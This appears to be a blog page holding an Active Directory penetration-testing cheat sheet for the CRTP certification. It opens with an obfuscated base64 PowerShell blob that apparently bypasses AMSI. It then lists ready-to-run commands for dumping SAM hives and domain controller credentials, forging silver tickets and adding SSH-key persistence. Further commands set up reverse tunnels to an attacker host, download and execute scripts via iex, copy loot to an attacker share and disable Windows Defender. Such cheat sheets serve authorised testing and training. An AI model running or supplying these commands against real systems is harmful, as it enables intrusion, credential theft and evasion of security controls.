IAAkACgAJABrADgAMQA0ADEAPQAnAEcALgBoACkAUAA1AGcAPwBJAEkAJwA7ACQAYgA9AFsAYgB5AHQAZQBbAF0AXQAoADAAeAAyADYALAAwAHgANAAzACkAOwAkAGsAYgA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAkAGsAOAAxADQAMQApADsALQBqAG8AaQBuACgAMAAuAC4AKAAkAGIALgBMAGUAbgBnAHQAaAAtADEAKQB8ACUAewBbAGMAaABhAHIAXQAoACQAYgBbACQAXwBdAC0AYgB4AG8AcgAkAGsAYgBbACQAXwAlACQAawBiAC4ATABlAG4AZwB0AGgAXQApAH0AKQApACwAJAAoACQAawA0ADMAOQAzAD0AJwByAFAAKQB7AF8AKAB0ACcAOwAkAGIAPQBbAGIAeQB0AGUAWwBdAF0AKAAwAHgAMAAxACwAMAB4ADMAOQAsADAAeAA2ADAALAAwAHgAMQA1ACkAOwAkAGsAYgA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAkAGsANAAzADkAMwApADsALQBqAG8AaQBuACgAMAAuAC4AKAAkAGIALgBMAGUAbgBnAHQAaAAtADEAKQB8ACUAewBbAGMAaABhAHIAXQAoACQAYgBbACQAXwBdAC0AYgB4AG8AcgAkAGsAYgBbACQAXwAlACQAawBiAC4ATABlAG4AZwB0AGgAXQApAH0AKQApACwAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAGIAeQB0AGUAWwBdAF0AKAAwAHgANgA5ACwAMAB4ADcANAAsADAAeAA0ADYAKQApACkALAAoAC0AagBvAGkAbgAoAFsAYwBoAGEAcgBdADAAeAA2ADEALAAgAFsAYwBoAGEAcgBdADAAeAA2ADkALAAgAFsAYwBoAGEAcgBdADAAeAA2AEMALAAgAFsAYwBoAGEAcgBdADAAeAA2ADUALAAgAFsAYwBoAGEAcgBdADAAeAA2ADQAKQApACkAOwAgACQAQwBTAFYAaABIAEYAIAA9ACAAWwBSAEUAZgBdAC4AQQBzAHMAZQBtAGIAbAB5AC4AZwBFAFQAVABZAHAARQAoACQAawA4AHYAcQAzACkAOwAgACQASQA1AHIAUwA5AHEAIAA9ACAAJABDAFMAVgBoAGgARgAuAEcARQBUAEYAaQBFAEwARAAoACQAaABOAHIAQQAzAGoAZQBzACwAIAAkACgAJABrADQANQA4ADYAPQAnAHYAMAB5AFgAMABbACcAOwAkAGIAPQBbAGIAeQB0AGUAWwBdAF0AKAAwAHgAMwA4ACwAMAB4ADUARgAsADAAeAAxADcALAAwAHgAMAA4ACwAMAB4ADQANQAsADAAeAAzADkALAAwAHgAMQBBACwAMAB4ADUAOQAsADAAeAAxAEEALAAwAHgANwA0ACwAMAB4ADYAMwAsADAAeAAyAEYALAAwAHgAMQA3ACwAMAB4ADQANAAsADAAeAAxADAALAAwAHgAMwBCACkAOwAkAGsAYgA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAkAGsANAA1ADgANgApADsALQBqAG8AaQBuACgAMAAuAC4AKAAkAGIALgBMAGUAbgBnAHQAaAAtADEAKQB8ACUAewBbAGMAaABhAHIAXQAoACQAYgBbACQAXwBdAC0AYgB4AG8AcgAkAGsAYgBbACQAXwAlACQAawBiAC4ATABlAG4AZwB0AGgAXQApAH0AKQApACkAOwAgACQASQA1AFIAUwA5AFEALgBzAEUAdABWAGEATAB1AEUAKAAkAG4AdQBsAGwALAAgACgAIQAwACkAKQA7AAoAaQBmACAAKAAkAGYAYQBsAHMAZQApACAAewAKACAAIAAgACAAJAByAGEAbgBkAG8AbQBHAHUAaQBkACAAPQAgAFsAZwB1AGkAZABdADoAOgBOAGUAdwBHAHUAaQBkACgAKQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAOwAgACQAaABtAGEAYwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEgATQBBAEMAUwBIAEEAMgA1ADYAOwAgACQAaABtAGEAYwAuAEsAZQB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAkAHIAYQBuAGQAbwBtAEcAdQBpAGQAKQA7ACAAJABoAGEAcwBoACAAPQAgACQAaABtAGEAYwAuAEMAbwBtAHAAdQB0AGUASABhAHMAaAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAiAEkAbgBwAHUAdABEAGEAdABhACIAKQApADsAIAAkAGgAYQBzAGgAUwB0AHIAaQBuAGcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaAApAC4AUgBlAHAAbABhAGMAZQAoACcALQAnACwAJwAnACkACgB9AAoAaQBmACAAKAA0ADYAIAAtAGcAdAAgADkAKQAgAHsAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgAuACIAIAAtAE4AbwBOAGUAdwBsAGkAbgBlACAAfQAgAGUAbABzAGUAIAB7ACAAVwByAGkAdABlAC0ASABvAHMAdAAgACIALAAiACAALQBOAG8ATgBlAHcAbABpAG4AZQAgAH0AOwAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiACIA'))))

Find local admin access

1
2
3
. C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess
Find-PSRemotingLocalAdminAccess -Domain <domain>

Network Discovery

1
2
3
4
5
# Ping sweep /24
for i in {1..255};do (ping -c 1 172.16.2.$i | grep "bytes from"|cut -d ' ' -f4|tr -d ':' &);done

# Ping sweep /16
for j in {1..255};do for i in {1..255};do (ping -c 1 172.16.$j.$i | grep "bytes from"|cut -d ' ' -f4|tr -d ':' &);done;done

Shell Tips

1
2
3
4
5
6
7
8
9
10
11
# Upgrade to proper TTY
python3 -c 'import pty; pty.spawn("/bin/bash")'

# Persistence via SSH key
ssh-keygen -t rsa
echo <pub_key> >> ~/.ssh/authorized_keys

# Log all commands (add to .zshrc)
mkdir ~/.log
PS1=$'[`date +"%d-%b-%y %T"`]%{\033[01;31m%} `ifconfig eth0 2>/dev/null | sed -n 2,2p | cut -d" " -f 10`%{\033[00m%} %{\033[01;34m%}%c%{\033[00m%} > '
test "$(ps -ocommand= -p $PPID | awk '{print $1}')" == 'script' || (script -f $HOME/.log/$(date +"%d-%b-%y_%H-%M-%S")_shell.log)

Pivot

Port Forwarding — SSH

1
2
3
4
5
# Access a locally exposed service on a remote machine
ssh -L <local_port>:localhost:<remote_port> <user>@<IP>

# SOCKS proxy via SSH
ssh -D 1080 -q -N -i id_rsa <user>@<IP>

Port Forwarding — Chisel

1
2
3
4
5
6
# On attacker (server)
./chisel server -p 5555 --reverse

# On victim (redirect port 3000 from 172.17.0.1 to attacker:8890)
./chisel client <attacker_IP>:5555 R:8890:172.17.0.1:3000
# Access at http://localhost:8890/

SOCKS Tunnel — Chisel (multi-pivot)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
# Attacker
./chisel server -p 5555 --reverse

# Victim 1
./chisel client <attacker_IP>:5555 R:1080:socks

# Victim 2
./chisel client <attacker_IP>:5555 R:2080:socks

# Victim 3
./chisel client <attacker_IP>:5555 R:3080:socks

# Configure /etc/proxychains4.conf with desired socks port
# socks5 127.0.0.1 1080

SOCKS Tunnel — Revsocks (reverse TCP, TLS)

1
2
3
4
5
6
7
# On VPS (server)
revsocks -listen :8443 -socks 127.0.0.1:1080 -pass SuperSecretPassword

# On victim (client)
revsocks -connect <VPS_IP>:8443 -pass SuperSecretPassword

# Connect to 127.0.0.1:1080 on the VPS with any socks5 client (proxychains etc.)

Credential Dumping (Local)

1
2
3
4
5
6
7
8
9
10
# Save registry hives locally
reg save HKLM\sam sam
reg save HKLM\security security
reg save HKLM\system system

# VSS copy of SAM (bypasses lock)
esentutl.exe /y /vss C:\Windows\System32\config\SAM /d c:\temp\sam

# Parse offline with secretsdump
secretsdump.py -sam sam -security security -system system LOCAL

Impersonation (run command as another user)

1
2
3
$password = ConvertTo-SecureString 'password' -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential('DOMAIN\user', $password)
Invoke-Command -ComputerName <target> -Credential $credential -ScriptBlock { whoami }

Silver Ticket (impacket)

1
2
3
4
5
6
7
8
9
# Find domain SID
lookupsid.py DOMAIN/[email protected] -domain-sids

# Forge TGS impersonating any user on a service
ticketer.py -nthash <HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> -spn <SPN> <USER>

# Use the ticket
export KRB5CCNAME=/home/pentest/<TICKET>.ccache
psexec.py DOMAIN/USER@<TARGET_IP> -k -no-pass

Dump credentials on Samba DC

1
2
3
4
5
6
7
8
# Install deps
sudo apt install samba krb5-user

# Vampire (dump DC remotely with DA creds)
net rpc -U administrator -S <DC_IP> vampire keytab dump.tab --force

# Extract NTLM hashes from keytab
klist -k dump.tab -K -e | grep arcfour-hmac | tr -s ' ' | cut -d ' ' -f 3,5 | sed 's/\ (0x/:/g' | tr -d ')'

File Transfer

From Linux → Windows

1
2
3
4
5
6
7
8
# Python HTTP server
python3 -m http.server 80

# SMB server (no auth)
impacket-smbserver share . -smb2support

# SMB server (with auth)
impacket-smbserver share . -smb2support -username user -password pass
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# Download via PowerShell
iwr http://<IP>/file.exe -OutFile C:\Temp\file.exe
(New-Object Net.WebClient).DownloadFile('http://<IP>/file.exe','C:\Temp\file.exe')
iex (iwr http://<IP>/script.ps1 -UseBasicParsing)   # download & execute

# Download via certutil
certutil.exe -urlcache -split -f http://<IP>/file.exe C:\Temp\file.exe

# Download via bitsadmin
bitsadmin /transfer job http://<IP>/file.exe C:\Temp\file.exe

# Copy from SMB share
copy \\<IP>\share\file.exe C:\Temp\
xcopy \\<IP>\share\file.exe C:\Temp\ /Y

# wget (if installed)
wget http://<IP>/file.exe -OutFile C:\Temp\file.exe

From Windows → Linux

1
2
3
4
5
6
7
8
# Upload to SMB share
copy C:\Temp\loot.txt \\<attacker_IP>\share\

# Upload via PowerShell (HTTP PUT)
Invoke-RestMethod -Uri http://<IP>/upload -Method PUT -InFile C:\Temp\file.txt

# Base64 encode and copy-paste
[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Temp\file"))
1
2
# Decode on Linux
echo <base64> | base64 -d > file

From Linux → Linux

1
2
3
4
5
6
7
8
9
10
# SCP
scp file.txt user@<IP>:/tmp/

# NC send
nc -lvp 4444 > received_file          # receiver
nc <IP> 4444 < file_to_send           # sender

# Base64
base64 file | nc <IP> 4444
nc -lvp 4444 | base64 -d > file

Windows → Windows

1
2
3
4
5
# SMB
copy C:\Temp\file.exe \\<target>\C$\Temp\

# PowerShell remoting
Copy-Item C:\Temp\file.exe -Destination C:\Temp\ -ToSession $sess

Hash Cracking (Hashcat)

Common modes

Hash type Mode Example command
NTLM 1000 hashcat -m 1000 hash.txt rockyou.txt
NTLMv1 5500 hashcat -m 5500 hash.txt rockyou.txt
NTLMv2 5600 hashcat -m 5600 hash.txt rockyou.txt
Kerberoast (TGS-RC4) 13100 hashcat -m 13100 hash.txt rockyou.txt
Kerberoast (TGS-AES128) 19600 hashcat -m 19600 hash.txt rockyou.txt
Kerberoast (TGS-AES256) 19700 hashcat -m 19700 hash.txt rockyou.txt
AS-REP Roast 18200 hashcat -m 18200 hash.txt rockyou.txt
MD5 0 hashcat -m 0 hash.txt rockyou.txt
SHA1 100 hashcat -m 100 hash.txt rockyou.txt
SHA256 1400 hashcat -m 1400 hash.txt rockyou.txt
bcrypt 3200 hashcat -m 3200 hash.txt rockyou.txt
NetNTLMv2 (captured) 5600 hashcat -m 5600 hash.txt rockyou.txt
DPAPI masterkey 15900 hashcat -m 15900 hash.txt rockyou.txt

Attack modes

1
2
3
4
5
6
7
8
9
10
11
12
13
14
# Wordlist
hashcat -m <mode> hash.txt rockyou.txt

# Wordlist + rules
hashcat -m <mode> hash.txt rockyou.txt -r /usr/share/hashcat/rules/best64.rule

# Brute force (mask)
hashcat -m <mode> hash.txt -a 3 ?a?a?a?a?a?a?a?a   # 8 chars all

# Combination
hashcat -m <mode> hash.txt -a 1 wordlist1.txt wordlist2.txt

# Show cracked
hashcat -m <mode> hash.txt --show

Mask characters

1
2
3
4
5
?l = lowercase (a-z)
?u = uppercase (A-Z)
?d = digits (0-9)
?s = special chars
?a = all (?l?u?d?s)

John the Ripper

1
2
3
john hash.txt --wordlist=rockyou.txt
john hash.txt --format=NT --wordlist=rockyou.txt
john hash.txt --show

Identify hash type

1
2
hashid <hash>
hash-identifier <hash>

BloodHound — Custom Cypher Queries

Queries NOT included in BloodHound’s default set.

Shadow admins (ACL-based privilege, not in DA group)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
// Users with GenericAll/AllExtendedRights on domain object (not already DA)
MATCH (u:User)-[:GenericAll|AllExtendedRights]->(d:Domain)
WHERE NOT (u)-[:MemberOf*1..]->(:Group {name:"DOMAIN [email protected]"})
RETURN u.name

// Users with GenericWrite on computers (RBCD candidates)
MATCH (u:User)-[:GenericWrite]->(c:Computer)
RETURN u.name, c.name

// Users with WriteDACL or WriteOwner on a Group
MATCH (u:User)-[:WriteDACL|WriteOwner]->(g:Group)
RETURN u.name, g.name

// Users with ForceChangePassword on DA members
MATCH (u:User)-[:ForceChangePassword]->(t:User)-[:MemberOf*1..]->(:Group {name:"DOMAIN [email protected]"})
RETURN u.name, t.name

Spread / attack surface

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
// Users with local admin on more than 3 machines (over-privileged)
MATCH (u:User)-[:AdminTo]->(c:Computer)
WITH u, count(c) AS n WHERE n > 3
RETURN u.name, n ORDER BY n DESC

// Computers where Domain Users are local admin (dangerous)
MATCH p=(g:Group {name:"DOMAIN [email protected]"})-[:AdminTo]->(c:Computer) RETURN c.name

// Non-DA users with sessions on DCs
MATCH (c:Computer)-[:HasSession]->(u:User)
WHERE c.name CONTAINS "DC" AND NOT (u)-[:MemberOf*1..]->(:Group {name:"DOMAIN [email protected]"})
RETURN c.name, u.name

// DA sessions on non-DC machines (pivot targets)
MATCH (u:User)-[:MemberOf*1..]->(:Group {name:"DOMAIN [email protected]"})
MATCH (c:Computer)-[:HasSession]->(u)
WHERE NOT c.name CONTAINS "DC"
RETURN c.name, u.name

Cross-domain / trust paths

1
2
3
4
5
6
7
8
9
// Foreign users with local admin in current domain
MATCH (u:User)-[:AdminTo]->(c:Computer)
WHERE u.domain <> c.domain
RETURN u.name, u.domain, c.name

// Cross-domain group memberships
MATCH (u:User)-[:MemberOf]->(g:Group)
WHERE u.domain <> g.domain
RETURN u.name, u.domain, g.name, g.domain

GPO abuse

1
2
3
4
5
6
7
8
// Principals with write rights on GPOs
MATCH (n)-[:GenericAll|GenericWrite|WriteOwner|WriteDACL]->(g:GPO)
RETURN n.name, g.name, g.guid

// GPOs applied to high value OUs (containing DCs)
MATCH (g:GPO)-[:GpLink]->(o:OU)-[:Contains]->(c:Computer)
WHERE c.name CONTAINS "DC"
RETURN g.name, o.name, c.name

Windows Defender

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
# Check real-time protection status
Get-MpPreference | select DisableRealtimeMonitoring
Get-MpComputerStatus | select RealTimeProtectionEnabled

# Disable real-time protection
Set-MpPreference -DisableRealtimeMonitoring $true

# Enable real-time protection
Set-MpPreference -DisableRealtimeMonitoring $false

# Disable other protections
Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -DisableIntrusionPreventionSystem $true
Set-MpPreference -DisableScriptScanning $true

# Add exclusion (path)
Add-MpPreference -ExclusionPath "C:\Temp"
Add-MpPreference -ExclusionPath "C:\Tools"

# Add exclusion (process)
Add-MpPreference -ExclusionProcess "powershell.exe"

# Add exclusion (extension)
Add-MpPreference -ExclusionExtension ".ps1"

# List all exclusions
Get-MpPreference | select -ExpandProperty ExclusionPath
Get-MpPreference | select -ExpandProperty ExclusionProcess
Get-MpPreference | select -ExpandProperty ExclusionExtension

# Remove an exclusion
Remove-MpPreference -ExclusionPath "C:\Temp"
avatar
UnChleuHacker
Articles
42
Tags
46
Categories
2
Follow Me
Recent Posts
CRTP CheatSheet
CRTP CheatSheet
Vulnlab - Sidecar
Vulnlab - Sidecar
Vulnlab - Vigilant
Vulnlab - Vigilant
NTDS Base
NTDS Base
Vulnlab - Kaiju
Vulnlab - Kaiju
Categories
Tags
NTDS Attacks AD Shadow Credentials Sliver Vulnlab GPP ElasticSearch Protocol ActiveDirectory Spooler PrivEsc RCBD RPC thm Tryhackme activedirectory thm,linux Webdav K2 NTLM Token laps,activedirectory BufferOverFlow GoldenTicket ESC7 LAPS control ESC13 RBCD PT1 windows Windows post-exploitation THM Printer keepass TryHackme C2 SLIVER
Archives
Website Info
Article Count :
42
Unique Visitors :
Page Views :
Last Update :